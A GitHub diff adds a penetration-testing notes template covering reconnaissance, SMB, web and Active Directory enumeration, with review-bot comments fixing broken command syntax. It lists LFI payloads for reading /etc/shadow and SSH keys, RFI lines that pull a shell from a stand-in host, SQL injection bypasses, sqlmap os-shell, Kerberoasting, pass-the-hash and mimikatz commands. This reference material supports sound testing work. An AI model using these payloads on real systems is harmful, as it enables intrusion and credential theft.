Showing 200 changed files with 7,579 additions and 0 deletions.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,2 @@ | ||
# Ignore Obsidian Files | ||
*.obsidian |
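Review bot: the `*.obsidian` pattern is broader than the `# Ignore Obsidian Files` comment describes. Obsidian keeps a vault's settings in a directory named `.obsidian/`, so the conventional rule is `.obsidian/`; `*.obsidian` additionally ignores any file whose name ends in `.obsidian`. Getting this rule right matters for a pentest vault: `.obsidian/workspace.json` records recently opened note paths, so committing it by accident would expose engagement and target file names, and a reviewer should be able to see at a glance that the directory is excluded.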
100 changes: 100 additions & 0 deletions
Pentest_Template_Master_1.0/Pentest Template Master 1.0/1. Recon/General Notes.md
@@ -0,0 +1,100 @@ | ||
# "PCAP IT OR IT DIDNT HAPPEN...its up to you if you need to" | ||
|
||
|
||
## tcpdump: | ||
|
||
- tcpdump -i eth0 | ||
- tcpdump -c -i eth0 | ||
- tcpdump -A -i eth0 | ||
- tcpdump -w 0001.pcap -i eth0 | ||
- tcpdump -r 0001.pcap | ||
- tcpdump -n -i eth0 | ||
- tcpdump -i eth0 port 22 | ||
- tcpdump -i eth0 -src 172.21.10.X | ||
- tcpdump -i eth0 -dst 172.21.10.X | ||
|
||
Other tools: | ||
|
||
Tshark (Command Line Wireshark) | ||
Wireshark | ||
|
||
|
||
## Network Scanning | ||
|
||
NetDiscover (ARP Scanning): | ||
- netdiscover -i eth0 | ||
- netdiscover -r 172.21.10.0/24 | ||
|
||
Nmap: | ||
|
||
- nmap -sn 172.21.10.0/24 | ||
- nmap -sn 172.21.10.1-253 | ||
- nmap -sn 172.21.10.* | ||
|
||
Nbtscan: | ||
- nbtscan -r 172.21.1.0/24 | ||
|
||
Linux Ping Sweep (Bash) | ||
|
||
- for i in {1..254} ;do (ping -c 1 172.21.10.$i | grep "bytes from" &) ;done | ||
|
||
Windows Ping Sweep (Run on Windows System) | ||
|
||
- for /L %i in (1,1,255) do @ping -n 1 -w 200 172.21.10.%i > nul && echo 192.168.1.%i is up. | ||
|
||
|
||
|
||
## Host Scanning | ||
|
||
Nmap: | ||
|
||
- nmap -sC -sV 172.21.0.0 | ||
- nmap -sV -Pn 172.21.0.0 | ||
- nmap -T4 -sC -sV 172.21.0.0 | ||
- nmap -A 172.21.0.0 | ||
|
||
IPv6 Scan: | ||
|
||
Nmap Scripts: | ||
|
||
Location: /usr/share/nmap/scripts/ | ||
|
||
- nmap --scripts vuln,safe,discovery -oN results.txt target-ip | ||
|
||
Scans through Socks proxy: | ||
|
||
- nmap --proxies socks4://proxy-ip:8080 target-ip | ||
|
||
DNSRecon: | ||
|
||
- dnsrecon -d www.example.com -a | ||
- dnsrecon -d www.example.com -t axfr | ||
- dnsrecon -d <startIP-endIP> | ||
- dnsrecon -d www.example.com -D <namelist> -t brt | ||
|
||
Dig: | ||
|
||
- dig www.example.com + short | ||
- dig www.example.com MX | ||
- dig www.example.com NS | ||
- dig www.example.com> SOA | ||
- dig www.example.com ANY +noall +answer | ||
- dig -x www.example.com | ||
- dig -4 www.example.com (For IPv4) | ||
- dig -6 www.example.com (For IPv6) | ||
- dig www.example.com mx +noall +answer example.com ns +noall +answer | ||
- dig -t AXFR www.example.com | ||
|
||
Sublis3r: | ||
|
||
- Sublist3r -d www.example.com | ||
- Sublist3r -v -d www.example.com -p 80,443 | ||
|
||
OWASP AMASS: | ||
|
||
- amass enum -d www.example.com | ||
- amass intel -whois -d www.example.com | ||
- amass intel -active 172.21.0.0-64 -p 80,443,8080,8443 | ||
- amass intel -ipv4 -whois -d www.example.com | ||
- amass intel -ipv6 -whois -d www.example.com | ||
|
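Review bot: several of the commands in this file will not run as written, and a quick-reference file is only useful if each line can be pasted. In the tcpdump section, `tcpdump -c -i eth0` is missing the packet count that `-c` requires (for example `-c 100`), and `-src` / `-dst` are not tcpdump options; host selection is a BPF filter expression such as `src host 172.21.10.X` or `dst host 172.21.10.X`. The Windows ping sweep pings `172.21.10.%i` but echoes `192.168.1.%i is up.`, so the printed result names the wrong subnet. `nmap --scripts vuln,safe,discovery` should be `--script`; the `IPv6 Scan:` heading has no command under it (nmap needs `-6` for IPv6 targets); and the `--proxies socks4://...` line is misleading as a "scan through proxy" note, because nmap documents `--proxies` as affecting only NSE scripts and version detection, not the ping, port-scan or OS-detection phases, which still go direct. In the DNS section, `dig www.example.com + short` should be `+short`, `dig www.example.com> SOA` contains a stray `>` that redirects the output into a file named `SOA` instead of querying the SOA record, `dig -x` takes an IP address rather than a hostname, and `dig -t AXFR www.example.com` needs a zone and a server (`dig @nameserver example.com AXFR`); likewise `dnsrecon -d <startIP-endIP>` should use `-r <startIP-endIP>` (with `-t rvl`) since `-d` expects a domain. `Sublis3r:` is a typo for `Sublist3r`, and the binary is lower-case `sublist3r`. In the Amass section, `-active` is a boolean flag, so `amass intel -active 172.21.0.0-64 ...` needs the range passed via `-addr 172.21.0.0-64`.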
6 changes: 6 additions & 0 deletions
Pentest_Template_Master_1.0/Pentest Template Master 1.0/1. Recon/Target _1.md
@@ -0,0 +1,6 @@ | ||
# Fill in results or other information about your target here: | ||
|
||
|
||
|
||
|
||
|
6 changes: 6 additions & 0 deletions
...Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/General Notes.md
@@ -0,0 +1,6 @@ | ||
# When in Doubt...Always Enumerate! Enumeration is the key! | ||
|
||
|
||
|
||
## Resources | ||
- http://www.0daysecurity.com/penetration-testing/enumeration.html |
12 changes: 12 additions & 0 deletions
...Master_1.0/Pentest Template Master 1.0/2. Enumeration/Impacket General Notes.md
@@ -0,0 +1,12 @@ | ||
## In Kali | ||
|
||
apt install impacket-scripts | ||
|
||
## Github | ||
|
||
https://github.com/SecureAuthCorp/impacket | ||
|
||
## Local Locations: | ||
|
||
/usr/share/doc/python3-impacket/examples | ||
|
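Review bot: the `https://github.com/SecureAuthCorp/impacket` line points at the old organisation; the project now lives at `https://github.com/fortra/impacket` (the old URL redirects, but the note should carry the current one). It would also help to state here how the two invocation styles used elsewhere in this commit relate: the Kali `impacket-scripts` package installs `impacket-*` wrappers around the scripts shipped under `/usr/share/doc/python3-impacket/examples`, so `impacket-GetUserSPNs` and `python3 GetUserSPNs.py` are the same tool.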
24 changes: 24 additions & 0 deletions
...Master_1.0/Pentest Template Master 1.0/2. Enumeration/Impacket Kerberoasting.md
@@ -0,0 +1,24 @@ | ||
## Check for Kerberoasting: | ||
|
||
- GetNPUsers.py DOMAIN-Target/ -usersfile user.txt -dc-ip <IP> -format hashcat/john | ||
|
||
## GetUserSPNs | ||
|
||
ASREPRoast: | ||
- impacket-GetUserSPNs <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file> | ||
- impacket-GetUserSPNs <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file> | ||
|
||
Kerberoasting: | ||
- impacket-GetUserSPNs <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file> | ||
|
||
Overpass The Hash/Pass The Key (PTK): | ||
- python3 getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash> | ||
- python3 getTGT.py <domain_name>/<user_name> -aesKey <aes_key> | ||
- python3 getTGT.py <domain_name>/<user_name>:[password] | ||
|
||
## Using TGT key to excute remote commands from the following impacket scripts: | ||
|
||
- python3 psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass | ||
- python3 smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass | ||
- python3 wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass | ||
|
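Review bot: the labels and tool names in this file are crossed. The `## Check for Kerberoasting:` heading sits over a `GetNPUsers.py` command, which performs AS-REP roasting, not Kerberoasting; and under `ASREPRoast:` both lines invoke `impacket-GetUserSPNs` with `-usersfile`, `-format` and `AS_REP` placeholders, which are `GetNPUsers` options (`GetUserSPNs` has no `-usersfile`). Suggest swapping them so the AS-REP lines use `impacket-GetNPUsers` and the first heading reads AS-REP roasting, and keeping only `GetUserSPNs` under `Kerberoasting:`. `excute` in the last heading is a typo for `execute`.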
23 changes: 23 additions & 0 deletions
...est_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Responder.md
@@ -0,0 +1,23 @@ | ||
Cannot use in the OSCP Exam. Fun to use on assessments. | ||
Note: Multirelay.py does not work in python3 since the UserDict library has been depricated | ||
|
||
|
||
# Source: https://github.com/lgandx/Responder | ||
|
||
## Make changes to config to turn off services: | ||
|
||
nano /usr/share/responder/Responder.conf | ||
|
||
## Starting Responder: | ||
|
||
- responder -I [Interface] -A | ||
- responder -I [Interface] -i [IP Address] or -e [External IP] -A | ||
|
||
## Tools in Responder: | ||
|
||
Location: /usr/share/Responder/tools | ||
|
||
## Check for systems with SMB Signing not enabled | ||
|
||
- python3 RunFinger.py -i 172.21.0.0/24 | ||
|
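Review bot: the install path is written two ways, `/usr/share/responder/Responder.conf` and `/usr/share/Responder/tools`; on Kali the package directory is lower-case `responder`, so the second path will not resolve on a case-sensitive filesystem. `depricated` on the second line is a typo for `deprecated`, and the `-i [IP Address] or -e [External IP]` line should be split into two commands, since the `or` is not valid syntax. The `RunFinger.py` section would also read better with its purpose stated: hosts that report signing as not required are the ones on which enforcing SMB signing (via Group Policy) removes the relay exposure this file is about.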
102 changes: 102 additions & 0 deletions
...1.0/Pentest Template Master 1.0/2. Enumeration/Services/1. Web/General Notes.md
@@ -0,0 +1,102 @@ | ||
|
||
## Step 1: ALWAYS LOOK AT THE SOURCE CODE OF THE WEBPAGE! | ||
|
||
|
||
## Web App Scanners | ||
|
||
Nikto: | ||
|
||
- nikto --url <domain> | ||
|
||
Wpscan: | ||
|
||
- wpscan --url <domain> | ||
- wpscan --url <domain> --enumerate ap at (All Plugins, All Themes) | ||
- wpscan --url <domain> --enumerate u (Usernames) | ||
- wpscan --url <domain> --enumerate v | ||
|
||
Web Tools for Directory Scanning: | ||
|
||
Dirb: | ||
|
||
- dirb <domain> | ||
- dirb <domain> <wordlist> | ||
|
||
Gobuster: | ||
|
||
- gobuster -u <url> -w /usr/share/wordlists/<Wordlist file> | ||
- gobuster -u <url> -w /usr/share/wordlists/<Wordlist file> -a Firefox (Custom Agent) | ||
- gobuster -u <url> -w /usr/share/wordlists/<Wordlist file> -x .php,.txt,.html | ||
- gobuster -u <url> -w /usr/share/wordlists/<Wordlist file> -x .php,.txt,.html -s "200" | ||
- gobuster -e -u <url> -w /usr/share/wordlists/<Wordlist file> -x .php,.txt,.html -s "200" | ||
- gobuster -v -e -u <url> -w /usr/share/wordlists/<Wordlist file> -x .php,.txt,.html -s "200" | ||
- gobuster -v -e -u <url> -w /usr/share/wordlists/<Wordlist file> -x .php,.txt,.html -s "200" -o output.txt | ||
- gobuster -s 200,204,301,302,307,403 -u 172.21.0.0 -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0' | ||
|
||
Wfuzz: | ||
|
||
- wfuzz -w wordlist/general/common.txt http://testphp.vulnweb.com/FUZZ | ||
- wfuzz -z range,0-10 --hl 97 http://testphp.vulnweb.com/listproducts.php?cat=FUZZ | ||
- wfuzz -z file,wordlist/others/common_pass.txt -d "uname=FUZZ&pass=FUZZ" --hc 302 http://testphp.vulnweb.com/userinfo.php (Post Requests) | ||
|
||
- wfuzz -z file,wordlist/general/common.txt -b cookie=value1 -b cookie2=value2 http://testphp.vulnweb.com/FUZZ (Fuzzing Cookies) | ||
|
||
Dirsearch: | ||
|
||
- dirsearch /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 172.21.0.0 -e php | ||
|
||
|
||
Other Tools: | ||
- Burp Suite | ||
- OWASP Zap | ||
- Cadaver | ||
- SQLMap | ||
- Joomscan | ||
|
||
|
||
## Testing for LFI: | ||
|
||
https://www.exploit-db.com/docs/english/40992-web-app-penetration-testing---local-file-inclusion-(lfi).pdf | ||
|
||
Examples: | ||
|
||
http://example.com/index.php?page=etc/passwd | ||
http://example.com/index.php?page=etc/passwd%00 | ||
http://example.com/index.php?page=../../etc/passwd | ||
http://example.com/index.php?page=%252e%252e%252f | ||
http://example.com/index.php?page=....//....//etc/passwd | ||
|
||
Interesting Files: | ||
|
||
Linux: | ||
/etc/passwd | ||
/etc/shadow | ||
/etc/issue | ||
/etc/group | ||
/etc/hostname | ||
/etc/ssh/ssh_config | ||
/etc/ssh/sshd_config | ||
/root/.ssh/id_rsa | ||
/root/.ssh/authorized_keys | ||
/home/user/.ssh/authorized_keys | ||
/home/user/.ssh/id_rsa | ||
|
||
Windows: | ||
|
||
Windows: | ||
/boot.ini | ||
/autoexec.bat | ||
/windows/system32/drivers/etc/hosts | ||
/windows/repair/SAM | ||
|
||
|
||
|
||
## Testing for RFI: | ||
|
||
http://example.com/index.php?page=http://callback.com/shell.txt | ||
http://example.com/index.php?page=http://callback.com/shell.txt%00 | ||
http://example.com/index.php?page=http:%252f%252fcallback.com%252fshell.txt | ||
|
||
## Resources | ||
|
||
- Turning LFI to RFI: https://l.avala.mp/?p=241 |
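Review bot: a few of the scanner invocations here use the wrong syntax for the tools' current releases. `wpscan --enumerate ap at` must be comma-separated (`--enumerate ap,at`), and `--enumerate v` is not a valid value (vulnerable plugins and themes are `vp` and `vt`). All the `gobuster -u ... -w ...` lines omit the `dir` mode that gobuster has required since 3.0 (`gobuster dir -u <url> -w <wordlist>`), and in 3.1+ setting `-s "200"` also requires `-b ""` because the default status-code blacklist conflicts with an explicit allow-list. The SecLists path `/usr/share/seclists/Discovery/Web_Content/big.txt` should be `Web-Content` (hyphen). `dirsearch` does not take the wordlist as a positional argument; it needs `-w <wordlist> -u <url>`. Under `Interesting Files:` the `Windows:` heading is duplicated.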
25 changes: 25 additions & 0 deletions
...1.0/Pentest Template Master 1.0/2. Enumeration/Services/1. Web/SQL Injection.md
@@ -0,0 +1,25 @@ | ||
Testing for Bypasses: | ||
|
||
' or 1=1 LIMIT 1 -- | ||
' or 1=1 LIMIT 1 -- - | ||
' or 1=1 LIMIT 1# | ||
'or 1# | ||
' or 1=1 -- | ||
' or 1=1 -- - | ||
|
||
# SQLMAP | ||
|
||
## sqlmap crawl | ||
sqlmap -u http://172.21.0.0 --crawl=1 | ||
|
||
## sqlmap dump database | ||
sqlmap -u http://172.21.0.0 --dbms=mysql --dump | ||
|
||
## sqlmap shell | ||
sqlmap -u http://172.21.0.0 --dbms=mysql --os-shell | ||
|
||
# SQLI | ||
|
||
Testing for a row: | ||
|
||
- http://target-ip/inj.php?id=1 union all select 1,2,3,4,5,6,7,8 |
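Review bot: the comment-terminator payloads lose their meaning if trailing whitespace is stripped: in MySQL `--` only starts a comment when it is followed by a space, which is exactly why the `-- -` variants exist. Since editors commonly trim trailing spaces, the file should say that `' or 1=1 --` needs the trailing space, or standardise on `-- -` and `#`. The three `sqlmap -u http://172.21.0.0` lines also target a bare host with no parameter; `--crawl=1` makes sense there, but the `--dump` and `--os-shell` lines have nothing to test unless given a URL with a parameter or a saved request file.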
1 change: 1 addition & 0 deletions
...ter_1.0/Pentest Template Master 1.0/2. Enumeration/Services/1. Web/Target _1.md
@@ -0,0 +1 @@ | ||
# Fill in results or other information about your target here: |
63 changes: 63 additions & 0 deletions
...1.0/Pentest Template Master 1.0/2. Enumeration/Services/2. SMB/General Notes.md
@@ -0,0 +1,63 @@ | ||
|
||
## Enumerate SMB: | ||
|
||
Enum4linux: | ||
|
||
- Enum4linux -a 172.21.0.0 | ||
|
||
SMBmap: | ||
|
||
- smbmap -H 172.21.0.0 -d [domain] -u [user] -p [password] | ||
- smbmap -H 172.21.0.0 -d [domain] -u "" -p "" | ||
|
||
Nmap: | ||
|
||
- nmap --script smb-* -p 139,445, 172.21.0.0 | ||
- nmap --script smb-enum-* -p 139,445, 172.21.0.0 | ||
|
||
/usr/share/nmap/scripts/smb-brute.nse | ||
/usr/share/nmap/scripts/smb-enum-domains.nse | ||
/usr/share/nmap/scripts/smb-enum-groups.nse | ||
/usr/share/nmap/scripts/smb-enum-processes.nse | ||
/usr/share/nmap/scripts/smb-enum-services.nse | ||
/usr/share/nmap/scripts/smb-enum-sessions.nse | ||
/usr/share/nmap/scripts/smb-enum-shares.nse | ||
/usr/share/nmap/scripts/smb-enum-users.nse | ||
/usr/share/nmap/scripts/smb-flood.nse | ||
/usr/share/nmap/scripts/smb-ls.nse | ||
/usr/share/nmap/scripts/smb-mbenum.nse | ||
/usr/share/nmap/scripts/smb-os-discovery.nse | ||
/usr/share/nmap/scripts/smb-print-text.nse | ||
/usr/share/nmap/scripts/smb-protocols.nse | ||
/usr/share/nmap/scripts/smb-psexec.nse | ||
/usr/share/nmap/scripts/smb-security-mode.nse | ||
/usr/share/nmap/scripts/smb-server-stats.nse | ||
/usr/share/nmap/scripts/smb-system-info.nse | ||
|
||
|
||
SMBClient: | ||
|
||
- smbclient -L 172.21.0.0 | ||
- smbclient //172.21.0.0/tmp | ||
|
||
Impacket SmbClient: | ||
|
||
- /usr/share/doc/python3-impacket/examples/smbclient.py username@172.21.0.0 | ||
|
||
RPCclient: | ||
|
||
- rpcclient -U "" -N 172.21.0.0 enumdomusers | ||
|
||
Impacket: | ||
|
||
- python3 samdump.py SMB 172.21.0.0 | ||
|
||
CrackMapExec: | ||
|
||
- crackmapexec smb -L | ||
- crackmapexec 172.21.0.0 -u Administrator -H [hash] --local-auth | ||
- crackmapexec 172.21.0.0 -u Administrator -H [hash] --share | ||
- crackmapexec smb 172.21.0.0/24 -u user -p 'Password' --local-auth -M mimikatz | ||
|
||
|
||
|
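Review bot: `Enum4linux -a 172.21.0.0` uses a capitalised binary name; the command is `enum4linux`. In the nmap lines, `--script smb-*` is unquoted, so the shell may expand the glob against the current directory before nmap sees it (`--script "smb-*"`), and `-p 139,445,` has a trailing comma. `python3 samdump.py SMB 172.21.0.0` refers to a script that does not exist under that name; the Impacket script is `samrdump.py`, and its current form takes `[domain/]user[:password]@target` rather than the old `SMB` protocol positional. The second and third CrackMapExec lines omit the `smb` protocol that the other lines include, and `--share` should be `--shares`.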
1 change: 1 addition & 0 deletions
...ter_1.0/Pentest Template Master 1.0/2. Enumeration/Services/2. SMB/Target _1.md
@@ -0,0 +1 @@ | ||
# Fill in results or other information about your target here: |